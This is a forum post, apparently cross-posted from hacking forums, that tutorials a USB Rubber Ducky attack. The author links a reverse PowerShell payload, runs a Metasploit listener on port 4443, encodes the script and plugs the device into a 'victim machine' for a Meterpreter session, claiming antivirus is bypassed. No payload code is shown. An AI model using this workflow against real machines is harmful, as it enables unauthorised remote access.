(ALso posted this on Viphackforums and Ubers
Well,
Yesterday my WIfi Pineapple Mark V and USB Rubber Ducky came in.
I love them. They are really great pentesting tools.
In this tutorial we are going to talk about USB Rubber Ducky scripts.So, what is it?
It's basically a HID (Human Inteface Device) normally the autorun scripts are forbidden but with this you can run them. Plus it will run the scripts on a human way so an Antivirus will never see the powershell, keylogger etc etc.
HAK5 information about the USB RDNearly every computer including desktops, laptops, tablets and smartphones take input from Humans via Keyboards. It's why there's a specification with the ubiquitous USB standard known as HID - or Human Interface Device. Simply put, any USB device claiming to be a Keyboard HID will be automatically detected and accepted by most modern operating systems. Whether it be a Windows, Mac, Linux or Android device the Keyboard is King.
By taking advantage of this inherent trust with scripted keystrokes at speeds beyond 1000 words per minute traditional countermeasures can be bypassed by this tireless trooper - the USB Rubber Ducky.
Source: https://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxeThe set of the USB Rubber Ducky looks like this:
Well basically I downloaded a script that will make a reverse powershell:
https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-DuckyAfter that I run the Ruby set up of this specific script and run the multi/handler exploit on Metasploit to start a listener on port 4443:
After the script is created I encoded it with the oficial USB Rubber Ducky encoder:
Now I put the encoded file on my USB Rubber Ducky SD card and put it in my USB Rubber Ducky:
Next I put the Rubber Ducky in my victim machine. Lets see what happends.
Video:------------------------------------------------------------------------------------------
https://www.youtube.com/watch?v=htoZVMH9vFM&feature=youtu.be------------------------------------------------------------------------------------------
This will take like 1 minute but you can minimize this.
Now we have generated a powershell on a fully patched machine.
Meterpreter session:
